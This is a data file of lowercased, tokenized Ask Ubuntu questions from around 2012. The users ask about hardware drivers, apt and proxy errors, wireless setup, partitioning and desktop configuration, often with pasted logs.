212029	help identifying device and driver for 0bda:1724	i have a new lenovo ideapad yoga 13 . the onboard lan/bluetooth device is identified in linux as 0bda:1724 ( via lsusb ) . no network peripherals are reported from lspci . online , the vendor : product above looks to be rt2573 , however , in windows , the device is identified as rtl8723a . i am trying to find a linux kernel module ( driver ) for this wlan card . i have tried rt2500usb , rt2x00usb , and rtl8723e , on 2.6.x and 3.x.x kernels , to no avail . i 've posted the output of lspci -nn -v and lsusb -v to : http : //pastebin.com/dqvtsvjf
212032	software update failed	i tried to update my ubuntu software and java through update manager . however , after all about few hours , it does not have any progress also . the errors message shown software updates correct errors , eliminate security vulnerabilities and provide new features . i did try to update and upgrade it through terminal but this is the error that i get : $ sudo apt-get upgrade & & update reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : libgnome2-0 linux-generic-pae linux-headers-generic-pae linux-image-generic-pae the following packages will be upgraded : accountsservice apparmor apport apport-gtk apport-symptoms apt apt-transport-https apt-utils aptdaemon aptdaemon-data base-files bind9-host coreutils dnsutils firefox firefox-globalmenu firefox-gnome-support firefox-locale-en firefox-locale-zh-hant gir1.2-gudev-1.0 gir1.2-javascriptcoregtk-3.0 gir1.2-webkit-3.0 gnome-power-manager icedtea-6-jre-cacao icedtea-6-jre-jamvm jockey-common jockey-gtk landscape-client-ui-install libaccountsservice0 libapt-inst1.4 libapt-pkg4.12 libbind9-80 libc-bin libc-dev-bin libc6 libc6-dev libdns81 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libglu1-mesa libgnome2-common libgssglue1 libgudev-1.0-0 libisc83 libisccc80 libisccfg82 libjavascriptcoregtk-1.0-0 libjavascriptcoregtk-3.0-0 libldap-2.4-2 liblwres80 libparted0debian1 libudev0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxatracker1 libxcb-composite0 libxcb-dri2-0 libxcb-glx0 libxcb-randr0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-xv0 libxcb1 linux-libc-dev login lsb-base lsb-release multiarch-support nfs-common onboard openjdk-6-jre openjdk-6-jre-headless openjdk-6-jre-lib parted passwd python-apport python-aptdaemon python-aptdaemon.gtk3widgets python-aptdaemon.pkcompat python-problem-report rpcbind sessioninstaller thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en thunderbird-locale-en-us thunderbird-locale-zh-hant thunderbird-locale-zh-tw udev unity-greeter update-manager update-manager-core update-notifier update-notifier-common wpasupplicant x11-utils xserver-xorg-input-wacom xserver-xorg-video-intel xterm 104 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . need to get 25.5 mb/126 mb of archives . after this operation , 701 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! base-files coreutils login libc6-dev libc-dev-bin libc-bin libc6 libapt-pkg4.12 apt libapt-inst1.4 libudev0 lsb-base libldap-2.4-2 libparted0debian1 libxcb1 libgl1-mesa-dri libgl1-mesa-glx libglapi-mesa libxcb-glx0 libgudev-1.0-0 libxatracker1 libxcb-composite0 libxcb-dri2-0 libxcb-randr0 libxcb-render0 libxcb-shape0 libxcb-shm0 libxcb-xv0 rpcbind lsb-release update-manager update-manager-core aptdaemon python-aptdaemon.pkcompat python-aptdaemon.gtk3widgets python-aptdaemon aptdaemon-data update-notifier update-notifier-common libglu1-mesa multiarch-support passwd apt-utils udev accountsservice libaccountsservice0 apt-transport-https parted python-problem-report python-apport apport apport-gtk apport-symptoms gir1.2-gudev-1.0 gnome-power-manager jockey-gtk jockey-common landscape-client-ui-install libgnome2-common nfs-common onboard unity-greeter wpasupplicant x11-utils xserver-xorg-input-wacom xserver-xorg-video-intel xterm sessioninstaller install these packages without verification [ y/n ] ? y err http : //my.archive.ubuntu.com/ubuntu/ precise-updates/main base-files i386 6.5ubuntu6.4 403 forbidden err http : //my.archive.ubuntu.com/ubuntu/ precise-updates/main coreutils i386 8.13-3ubuntu3.1 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? what should i do next ?
212033	is there an alternative to k3dsurf in 12.10 ?	i 've just upgraded to quantal quetzal on my home computer and discovered that the program k3dsurf has been removed from the repositories . ( presumably since it does n't seem to be in active development and still depends on qt3 libraries . ) does anyone know of a similar program ( user-friendly and versatile ) for drawing 3d surfaces ? this has been a mission-critical program for me when teaching multivariable calculus , so i wo n't be able to upgrade at work unless i can find a replacement . ( yes , i could install directly from the program 's website , but dealing with obsolete libraries sounds like a giant headache . )
212038	getting windows 7 to boot from external hard drive . using ubuntu	i have ubuntu 12.04lts as my current operating system , and i have a windows 7 iso on a disk . i 'm using an external hard drive because my internal hard drive has become damaged . i need to get windows to install onto my external hard drive ( where ubuntu is as well ) . the iso disk will not install windows to the hard drive . can anyone help guide me through the process of getting windows on the external ?
212044	my app is in pending review for long time	i have submitted a chess puzzle app before 4 days . i created the app in java platform . as i do not know how to package it , i have submitted my app in .jar format . till now my app is in pending review stage . please let me know when will they process it . my app name : knight 's tour submitted date : oct-31st-2012 submitted format : .jar
212047	does anybody facing problem while shutting ubuntu 11.04 down ?	when i clicked on shutdown or enter command halt/halt -f/shutdown ; system hangs up . last log message is `` init : rc main process killed ''
212051	webcam is not recognized on my samsung 300v5a-s19	i have samsung 300v5a-s19ru laptop , and its webcam is not recognized . i tried to follow this manual , but it does n't work for me . when i 'm trying to start cheese , it does n't see any webcam at all . its output : ** ( cheese:8161 ) : warning ** : cheese-main.vala:251 : error : no device found ( cheese:8161 ) : cheese-critical ** : cheese_camera_device_get_device_node : assertion cheese_is_camera_device ( device ) ' failed ( cheese:8161 ) : glib-critical ** : g_variant_new_string : assertion string ! = null ' failed ( cheese:8161 ) : glib-gio-critical ** : g_settings_schema_key_type_check : assertion value ! = null ' failed ( cheese:8161 ) : glib-critical ** : g_variant_get_type_string : assertion value ! = null ' failed ( cheese:8161 ) : glib-gio-critical ** : g_settings_set_value : key 'camera ' in 'org.gnome.cheese ' expects type 's ' , but a gvariant of type ' ( null ) ' was given ** ( cheese:8161 ) : critical ** : cheese_preferences_dialog_setup_resolutions_for_device : assertion device ! = null ' failed i tried install ov51x , but as i can understand it does n't work on linux kernel > 3.0 . trying to follow this , item 2.4 fails : % make make : *** no targets . stop . in this answer on askubuntu it 's written , that ov51x works on < 2.6 kernels only in samsung tech support they said that drivers for linux does not exist , but they said also , that in my laptop webcam sunplus tech scb-1100n is used . what do i do to make it work ? what driver or module should i use ? thanks in advance !
212060	checking apt-get update lock file	i have in stalled a dual boot beside windows and now i 'm having a problem checking apt-get update when i type in apt-get update this is the outcome . i do n't know what to do $ apt-get update e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? $ apt-get upgrade e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ?
212061	how do i speed up initial login ?	the initial login on my ubuntu 12.04 machine can take anywhere from 45 seconds to two minutes . if i log out , then log back in again , the login time takes between 4 and 7 seconds . how can i find out what it making that initial login take so long ? i 'm using lightdm . i consider login to be the time from hitting enter in the lightdm password prompt to the ui appearing in my x session . the delay occurs regardless of window manager ( i 'm using unity , but the initial gnome 2 login takes just as long ) edit here 's the output of bootchart : here 's a close-up of the interesting bits :
212064	where are the desktop applications listed ?	i am using ubuntu 12.04.1 on pc . where is the menu located which will give me gui access to all the installed software , programs and settings ? i can only see the help menu .
212065	effect of installing ldap server	i am new to the ldap server and i want to install a ldap server in my ubuntu dedicated server . my ubuntu dedicated server has lamp and other application servers installed and many websites are being served from that dedicated server . my question is , does any application server ( like : lamp , or others ) will be affected if i will configure ldap server in that ?
212067	proxy settings in 12.04	my system is running under corporate network . i need to set proxy server settings . but i am not sure if the format below is correct or not . i need a solution for this . i am using 12.04. http : //hbi\mfazil : password @ 123 @ proxy.server.com:8080/ hbi is domain name . i need to login using the prefix hbi . i am using @ in my password . both hbi\ and @ in the password will affect the syntax .
212068	installation procedure by wubi	i have installed ubuntu 12.04 on my machine by wubi software . during installation procedure , install stop/pause or take too much time ( 45 min . ) to install and stuck at that point.if i restart machine then after showing some error ubuntu get started and work fine ... if its the way to install ubuntu ?
212069	errors during start-up : “scanning for btrfs filesystems”	i have installed ubuntu 12.10 desktop on three systems and one virtual machine . on every system i have opted for a single btrfs partition . during start-up i get the following two error messages . it takes 3–10 seconds for the messages to disappear and the start-up to continue . “error : sparse file not allowed.” “scanning for btrfs filesystems” how do i resolve these problems ? ( and why do they need resolving ? )
212078	joomla on ubuntu 12.04 warning : failed to move file ! error	i am trying to install a template that i have downloaded online and it is giving me an error of warning : failed to move file ! .. how do i resolve this ? thanks !
212086	pidgin with sipe crash on start	i ca n't use pidgin as lync client after upgrading to ubuntu 12.10 . it fall with an segmentation fault error on startup . sergey @ ws153 : ~ $ pidgin `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load `menu_proxy_module_load ' : pidgin : undefined symbol : menu_proxy_module_load segmentation fault ( core dumped ) syslog : nov 5 10:06:55 ws153 kernel : [ 12453.225535 ] pidgin [ 21734 ] : segfault at 0 ip 00007f0891e1dad4 sp 00007fff7e9ee150 error 4 in libc-2.15.so [ 7f0891de1000+1b5000 ] i already try to remove ~/.purple folder and add accounts from scratch . but error appear again after adding office communicator account .
212089	where are store wifi connection parameters ?	when i do a fresh install of the distribution , one of the annoying things is that i lose all my wifi connection . thus i would like to know in which file all data are stored ( wep key and ssid ) in order to save it !
212091	reassign the right button functionality of touchpad	my notebook has a touchpad with two buttons . the touchpad works pretty well and i use it for vertical/horizontal scroll , two fingers scrolling etc . the left button acts like the left button of a mouse . the right button too , when clicked it makes appear the classic contextual menu ( create new folder , move to trash etc ... ) . the problem is that right button does n't work anymore for mechanical reasons , so pressing it has no effect . to recover the missing functionality , i 'd like that pressing ctrl + left button i get the same thing of pressing the right button alone . other combinations ( ctrl + shift + left button ) are also acceptable . any way to do that ?
212095	restoring deleted partitions/files	i had windows 7 installed on my computer and four partitions , namely , c ( where windows was installed ) , d , e , and f. i decided to install ubuntu and ended up deleting all my partitions , but one with ubuntu installed . is there any way i can get my files back ?
212097	bluetooth not finding any devices on 12.10	when i switch on my bluetooth and search for devices my laptop does n't find any even though there 's plenty in the area . most likely this is because of drivers that are missing . so what i want to know is if there 's a way i can view the exact details of what bluetooth device i have built into my laptop so i can start searching for a linux version of the needed driver . any tips ? ps - running 64bit 12.10
212101	how to disable kde suspend/screen lock notifications ?	every time i close the lid on my laptop it plays a sound . similarly , i 'm getting a notification that the screen has been locked when i wake it up again . i 've looked under kde power management system notifications , but there are no options for this . where can i configure and disable these notifications ? in either case there 's no need for a notification , as the i 'm the one performing the action or the effect is obvious .
212102	is it possible to convert live cd to alternate cd using jigdo ?	can i use jigdo to convert a ubuntu live cd to an alternate cd with minimal download ? the cd image i have is ubuntu-12.04.1-desktop-amd64.iso . is it possible ? or should i have to download the alternate iso ?
212103	can i change from recent apps to most frequent apps	i 'd like to change the way unity selects apps for the application lens from `` most recent '' to `` most frequent '' but i can find no way to do this . what to do ? i 'm using ubuntu 12.10
212104	thunderbird can not connect to smtp.googlemail.com	i am using thunderbird ( currently 16.0.2 ) for a long time in ubuntu . it works perfectly . but in two weeks , i got a notification : gmail account exceeded command or bandwidth limits , and i can not send email as well as receiving email using thunderbird and iphone . i did n't use mail client ( thunderbird and iphone ) for 1 day after that . and now , i can read email but can not sending email . the message could not be sent because the connection to smtp server smtp.googlemail.com timed out . try again or contact your network administrator . i try to telnet smtp.googlemail.com port 465 but no luck. , port 587 is ok . i change the the smtp server to port 587 . but i still can not send email . it show : connected to smtp.googlemail.com , but still show that window , and never send the email . any idea ? thank you very much .
212107	make windows float behind xfce panel	i would like to make it so windows maximize behind the xfce panel . basically so that all windows do not treat the xfce panel as a dock . i noticed that if i move the xfce panel away from the screen edge , then windows will properly ignore it but ... . i want the panel to touch the edge and have the windows all go behind it.. tia
212109	add unallocated space to extended partion	my primary partitions are full ( 4 ) . i have the extended partition holding my ubuntu and its swap . now , there are these two separate unallocated spaces which have failed to be used and i cant even add them to the extended partitions . please guide me how to have them in use . gparted have failed .
212111	panasonic dp-1510p	my issue regards ndiswrapper mainly . i 'm trying to setup this printer panasonic dp-1510p which is setup with an lpr queue on our work network . i went on the panasonic website and i downloaded the windows 32 bit driver . when i run ndiswrapper the output is this root @ alessandro-travelmate-8372 : ~/desktop/dg2lviai090319 # ndiswrapper-1.9 -i pfxsetup.inf installing pfxsetup ... could n't find install directive : `` panasonic dp-1510p '' = pan15pit.pfd could n't find install directive : `` panasonic dp-1810f '' = pan18fit.pfd could n't find install directive : `` panasonic dp-1810p '' = pan18pit.pfd could n't find install directive : `` panasonic dp-2010e '' = pan201it.pfd root @ alessandro-travelmate-8372 : ~/desktop/dg2lviai090319 # do you have any ideas ? i tried looking for this everywhere , but it seems no one has the `` could n't find install directive '' issue . what could this mean ? should i modify the driver somehow ? thank you for any and all help ! -ianhawke-
212113	how to solve critical logical driver	i was checking the logs in server when i came across this message . nov 4 12:52:05 servername serveraid manager agent : [ 338 ] periodic scan found one or more critical logical drives : controller 1 . repair as soon aspossible to avoid data loss . what does this mean ? is it critical or can be ignored ? if critical how to solve it ?
212116	remote desktop between ubuntu machines	my desktop and my laptop are connected to the same router . i want to be able to remote login from my laptop to my desktop . laptop is 12.04 and desktop is 12.10 . i tried putting xrdp on my desktop , but remmina would n't work with it . i also tried the default screen-sharing , but it was very slow . also tried rdesktop but it was very slow . i am on 12.10 , freenx looks like a good option but they do n't have a 12.10 release . and when i tried to install the 12.04 release , i got errors about dependencies missing . how can i get local-feeling remote login speeds ?
212121	unable to delete file from read-only file system	i can not delete files , when i tried to delete the file , this message appeard : '' error while deleting . there was an error deleting file2.rar . '' this is what i get from clicking on show more details : '' error removing file : read-only file system '' this is what i 've tried so far : deleting from the downloads directory from my user . deleting permanently , but it does not work . edit when trying to remount it as read/write i get this error : ~ $ sudo mount -o remount , rw /media/a88f-8788 [ sudo ] password for name : sudo : unable to open /var/lib/sudo/jianyue/1 : read-only file system mount : ca n't find /media/a88f-8788 in /etc/fstab or /etc/mtab edit again i heard it is one of the bugs , waiting to be fixed . just another edit on 2014 no information about the resolution of the bug . i 've not tried it again since then , because i have re-installed the system and misplaced files .
212127	what is the laptop that fully compatible with ubuntu ?	i have met alot of problems with all ubuntu releases on my current laptop ( dell inspiron n4030 ) , such as : out loud fan low battery life screen brightness returns to maximum after every startup weak support for my vga ( mobility radeon hd 5430 series ati card ) ubuntu is probably not scaling my processors correctly sometimes ubuntu hangs after return from suspend sometimes ubuntu does n't shutdown correctly now , it 's time to change my laptop for good , can you help me to choose a laptop that fully compatible with ubuntu releases , please notice that not every laptop are available in libyan markets .
212129	i am interested in dual booting window 's 7 32-bit and ubuntu 12.04 . how to do partitions ?	i intend to use half harddisk to win7 and other to ubuntu my pc info 500 gb hd [ 250 for win7 and other for ubuntu ] 4 gb ram ! amd phenom ii x2 555 processor 3.20hz ! i am confused how to do partitions i will install winds 7 first after it ubuntu ! needed help ! thanks in advance ! = )
212131	can i connect a printer through wifi if i only have internet through ethernet cable ?	i am in a residential accommodation that only uses ethernet cable to connect to the internet . i am thinking of buying a printer , and the ones that i am looking for connect to a computer/laptop with wifi . do i need wifi or can i connect with the printer in another way ?
212132	i ca n't add ppa repository behind the proxy	i 'm trying to add the ppa repository ( as a root ) with the following command : export http_proxy= '' http : //firstname.surname @ xxx.com : my_pass @ 165.x.x.232:8080 '' add-apt-repository ppa : nilarimogard/webupd8 traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 84 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 56 , 'received http code 407 from proxy after connect ' ) unfortunately it does n't work . looks like curl is connecting to the proxy , but the proxy says that authentication is required . i 've tried with .curlrc , http_proxy env instead , but it does n't work . strace -e network , write -s1000 add-apt-repository ppa : nilarimogard/webupd8 socket ( pf_inet6 , sock_dgram , ipproto_ip ) = 4 socket ( pf_inet , sock_stream , ipproto_tcp ) = 4 connect ( 4 , { sa_family=af_inet , sin_port=htons ( 8080 ) , sin_addr=inet_addr ( `` 165.x.x.232 '' ) } , 16 ) = -1 einprogress ( operation now in progress ) getsockopt ( 4 , sol_socket , so_error , [ 0 ] , [ 4 ] ) = 0 getpeername ( 4 , { sa_family=af_inet , sin_port=htons ( 8080 ) , sin_addr=inet_addr ( `` 165.x.x.232 '' ) } , [ 16 ] ) = 0 getsockname ( 4 , { sa_family=af_inet , sin_port=htons ( 46025 ) , sin_addr=inet_addr ( `` 161.20.75.220 '' ) } , [ 16 ] ) = 0 sendto ( 4 , `` connect launchpad.net:443 http/1.1\r\nhost : launchpad.net:443\r\nuser-agent : pycurl/7.22.0\r\nproxy-connection : keep-alive\r\naccept : application/json\r\n\r\n '' , 146 , msg_nosignal , null , 0 ) = 146 recvfrom ( 4 , `` http/1.1 407 proxy authentication required\r\nproxy-authenticate : basic realm=\ '' proxy\ '' \r\ncache-control : no-cache\r\npragma : no-cache\r\ncontent-type : text/html ; charset=utf-8\r\nproxy-connection : close\r\nset-cookie : bcsi-cs-91b9906520151dad=2 ; path=/\r\nconnection : close\ maybe it 's because there is @ sign in the username ? wget works with proxy fine . related : how do i add a repository from behind a proxy ? environment ubuntu 12.04 curl 7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 curl features : gss-negotiate idn ipv6 largefile ntlm ntlm_wb ssl libz tls-srp update when added credentials into .curlrc cat ~/.curlrc proxy = 165.x.x.232:8080 proxy-user = name.surname @ xxx.com : mypass0 it seems to work for the plain curl . curl www.google.com | head * proxy auth using basic with user 'name.surname @ xxx.com' get http : //www.google.com http/1.1 proxy-authorization : basic cmfmywwud2lly3pvcmvrqhvi ... 3r0rda= http/1.1 302 found also https : curl -v https : //www.google.com | head * establish http proxy tunnel to www.google.com:443 * proxy auth using basic with user 'name.surname @ xxx.com' > connect www.google.com:443 http/1.1 > host : www.google.com:443 > proxy-authorization : basic cmfmywwud2lly3pvcmvrqhvi ... 3r0rda= > user-agent : curl/7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 > proxy-connection : keep-alive < http/1.1 200 connection established * proxy replied ok to connect request * successfully set certificate verify locations but still does n't work when adding ppa certificate . pycurl.error : ( 56 , 'received http code 407 from proxy after connect ' ) curl headers headers sent : connect launchpad.net:443 http/1.1 host : launchpad.net:443 proxy-authorization : basic cgvvcgxlcmvhbgx5c2hvdwxkqhnhbml0axplcg9zdhm= user-agent : curl/7.22.0 ( x86_64-pc-linux-gnu ) libcurl/7.22.0 openssl/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3 proxy-connection : keep-alive reply : http/1.1 200 connection established pycurl headers headers sent : connect launchpad.net:443 http/1.1 host : launchpad.net:443 user-agent : pycurl/7.22.0 proxy-connection : keep-alive accept : application/json reply : http/1.1 407 proxy authentication required proxy-authenticate : basic realm= '' proxy '' it seems that pycurl does n't re-send any authorization when requested .
212134	12.04 lts : unity -- reset hangs	nearly each time i reboot my machine , the system panel and integrated app menus fail to load . at a terminal , when issuing 'unity -- reset ' , i get the following errors : ... initializing widget options ... done initializing winrules options ... done initializing wobbly options ... done error 2012-11-05 04:36:48 unity.glib-gobject < unknown > :0 g_object_unref : assertion `g_is_object ( object ) ' failed error 2012-11-05 04:36:48 unity.gtk < unknown > :0 gtk_window_resize : assertion `width > 0 ' failed warn 2012-11-05 04:37:14 unity < unknown > :0 unable to fetch children : no such interface `org.ayatana.bamf.view ' on object at path /org/ayatana/bamf/application885622223 error 2012-11-05 04:37:21 unity.glib-gobject < unknown > :0 g_object_set_qdata : assertion `g_is_object ( object ) ' failed setting update `` main_menu_key '' setting update `` run_key '' warn 2012-11-05 04:38:06 unity.iconloader iconloader.cpp:438 unable to load icon stock-person at size 24 warn 2012-11-05 04:38:26 unity.glib.dbusproxy glibdbusproxy.cpp:182 unable to connect to proxy : error calling startservicebyname for com.canonical.unity.lens.applications : timeout was reached warn 2012-11-05 04:38:26 unity.glib.dbusproxy glibdbusproxy.cpp:182 unable to connect to proxy : error calling startservicebyname for com.canonical.unity.lens.applications : timeout was reached the procedure hangs at this point .
212138	system crashes/lockups + compiz/cairo/gnome-panel crashing due to cached ram , please help ?	can someone help me to troubleshoot system crashes and lockups which result in compiz/cairo dock and gnome-panel crashing ? i also get no window borders after the crash and a lot of kernel memory errors . logs are telling me that apps were killed due to not enough memory , but the system is caching like 14gb of my ram so i 'm a bit stuck on what/how to stop it . i 'm running ubuntu 12.10 on a 2011 mac mini with 16 gb ram . here 's some of the logs that look like they could be causing trouble . i woke up this morning to find chrome/skype/cairo dock and a few others had been killed and here is what the log said . nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.959890 ] out of memory : kill process 12247 ( chromium-browse ) score 101 or sacrifice child nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.959893 ] killed process 12247 ( chromium-browse ) total-vm:238948kb , anon-rss:17064kb , file-rss:20008kb nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.972283 ] out of memory : kill process 10976 ( dropbox ) score 3 or sacrifice child nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.972288 ] killed process 10976 ( dropbox ) total-vm:316392kb , anon-rss:115484kb , file-rss:16504kb nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.975890 ] out of memory : kill process 10887 ( rhythmbox ) score 3 or sacrifice child nov 5 04:00:45 linkandzelda-macmini kernel : [ 9310.975895 ] killed process 11515 ( tray_icon_worke ) total-vm:63336kb , anon-rss:15960kb , file-rss:11436kb nov 5 04:00:45 linkandzelda-macmini kernel : [ 9311.281535 ] out of memory : kill process 10887 ( rhythmbox ) score 3 or sacrifice child nov 5 04:00:45 linkandzelda-macmini kernel : [ 9311.281539 ] killed process 10887 ( rhythmbox ) total-vm:528980kb , anon-rss:92272kb , file-rss:36520kb nov 5 04:00:45 linkandzelda-macmini kernel : [ 9311.283110 ] out of memory : kill process 10889 ( skype ) score 3 or sacrifice child nov 5 04:00:45 linkandzelda-macmini kernel : [ 9311.283113 ] killed process 10889 ( skype ) total-vm:415056kb , anon-rss:84880kb , file-rss:22160kb i went to look deeper into things and saw that the whole time i 'm having these kernel errors with out of memory and something mentioning radeon . i have a radeon hd 6600m graphics card using the open source driver , not the proprietary one . i was wondering if perhaps using the proprietary one would solve the problem . also , while writing this in chrome rhythmbox and chrome just got killed while typing this , due to out of memory errors or so it reports , though i have 7 gb of free ram at the time with 7 gb cached as well . here is a full copy of my logs that happened in kern.log simply from when i began typing this question . http : //pastebin.com/cdxxdktg thanks in advance , kris
212139	how to capture scroll window in ubuntu	in windows we can capture scrolled window using the software snagit is there a software or utility that can be used to capture the entire page .
212142	this system does not support opengl	i just got the error this system does not support opengl while opening stellarium . i 've search the internet to finds a solution but could n't find anything that works ... i have ubuntu 12.04 and the nvdia gt 540m video card
212144	customizing ubuntu colors	what application is recommended to accomplish these : how can i change my selection highlight color ? how can i change my cursors ? how can i include more libraries ?
212150	how to block shutdown in ubuntu 12.04 ?	sometime i run maintenance scripts in a machine . i want to temporally block users from been able to shuting-down the system while this task are running . how can i achieve this ?
212154	create a custom shortcut that types clipboard contents	i want to automate keyboard input so that i can `` paste '' my clipboard contents to a remote kvm such as ipmi , or raritan . to accomplish this , i installed xdotool and xclip . i then wrote a simple command that types the clipboard contents : xdotool type `` $ ( xclip -o ) '' this command works if i stay in a terminal window , and type that command myself . it types back my clipboard contents when i run the command . my goal is to bind this command to a hotkey so that works in any window that has focus . however , if i create a custom shortcut using keyboard settings , it does n't work . if i assign a hotkey alt+k to the shortcut , nothing happens when i press it . if i use ctrl+k , unexpected behavior occurs to whatever window has focus . e.g . my terminal window size shrinks ( it 's somewhat amusing , actually ) . similar results occur if i save it as a script and call the script , or if i encapsulate the command with sh -c. how can i make practical use of the powerful xdotool type command ? my steps to test this hotkey are as follows : copy the text hello world ! click on gedit press the hotkey
212156	start rhythmbox minimized	i 'm on quantal ( 12.10 ) . i ca n't find a way to start rhythmbox minimized in the sound menu . how can i do that ? yes , i 've seen the discussion how to start rhythmbox minimized ? but the solutions proposed do not work ( -- hide is not a valid option ) , some because are written for old versions , some because are totally wrong .
212161	not able to change volume in ubuntu 12.04	i am using ubuntu 12.04 i am unable to change volume and the devices are not shown in sound setting in root , but in guest session , it is working well .
212163	ca n't find menu ? i need it to connect to my wireless internet	in ubuntu help ( 12.10 ) it just tells me to go to 'menu ' . i ca n't find 'menu ' and so therefore i ca n't connect to my wifi . i 'm running ubuntu 12.10 off of a usb and i do n't know how to connect to the internet .
212164	how do i disable the alt - tab switcher ?	i would like to disable the alt+tab ( or all of the alt+ combinations ) on my ubuntu 12.04 lts . i tried to disable at system preferences - > keyboard shortcuts , but this method does n't seem to be working . later i tried to activate an own shortcut for alt+tab ( like an overwriting attempt ) , without any success ... is there a way to disable this with or without compiz ?
212166	how to install acunetix ?	acunetix is the software to check web vulnerability scanner . i ca n't find the linux version anywhere . is that possible to install this software in ubuntu 12.04
212171	how to display usage of the intel hd 3000 ?	i can see the cpu usage with top and htop . is there some way to monitor the usage of the intel hd 3000 graphics card in my system ?
212175	i ca n't install skype !	i 'm in the dark without skype so i tried to install it from the official skype website i 've tried both the 32bit and 64bit but it will not install , instead the software center tells me the package operation failed ( basically failed to download ) . although i do get the application on my applications but when i click it glows and nothing happens . details of the error : selecting previously unselected package skype . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 161935 files and directories currently installed . ) unpacking skype ( from ... /skype-ubuntu_4.0.0.8-1_amd64 ( 4 ) .deb ) ... dpkg : dependency problems prevent configuration of skype : skype depends on ia32-libs ; however : package ia32-libs is not installed . dpkg : error processing skype ( -- install ) : dependency problems - leaving unconfigured processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... help , this is driving me crazy ! also please be try to be simple i 'm not a ubuntu/linux veteran . @ ican that failed to work and the other two i completely do not understand .
212177	flash video intermittent browser freeze	i have had this issue for a while , and have searched for solutions . it may be associated with my graphics card ( since i also have other issues ) but i am not quite sure . i can play flash videos just fine in both firefox and chrome , both generally load quickly . however , very intermittently , either or both browsers will have all graphics freeze within the browser window . it looks like only within the browser window the graphics card fails to refresh the image . this affects the video , scrolling , and tabs . to refresh , i have to switch apps or click on the desktop to remove focus from the browser , which then automagically refreshes . somtimes this is permanent and i can keep using it , sometime it is temporary and as soon as i click on the browser again it freezes again . very important to this issue is that the elements in the browser , like tabs , links , and scrolling still function . example : start youtube video , browser freezes , try to scroll down the page , nothing happens , click on desktop to remove focus from browser , window refreshes to the point the scrolling should have ended . i.e . scrolling does not seem to occur after refresh but during scrolling , and is only shown after browser loses focus . dell precision t3400 dual monitor setup ubuntu 12.04lts with latest updates nvidia quadro fx 570/pcie/sse2 . any ideas ?
212179	ubuntu 12.10 external ram on old laptop ?	got this old fujitsu-siemens amilo pro v2010 on which i run now ubuntu 12.10 . tried to open the back for adding extra ram . unfortunately , the back does n't go off . so i now was curious if i could just use a memory stick and have it be used via usb-plug as an additional external ram ? how would ubuntu 12.10 then tie that in ?
212186	how to see available wireless networks on 12.10 ?	i 'm using a dell inspiron laptop with ubuntu 12.10 . i am new to linux . i am typing this from a wired connection because i can not find how to set up my wireless router . when i first installed 12.10 it gave me a men in the install wizard to set up wifi but when i restarted it turned off . i can not figure out how to get wireless , or to see available wireless routers . wifi is on and works with my ipad but i literally can not find the place to enable wifi on this os . what am i doing wrong ?
212187	how to launch multiple processes from the dash ?	is there a way to configure the ubuntu 12.04 menu/dash to launch multiple instances ( processes ) of an application ? with vim , i sometimes like to launch several versions of it . with vim configured on the toolbar , i am able to launch vim once or quit vim . if i click on the vim icon with one vim session running , i can only go back to the one vim session . does such a configuration setting exist ?
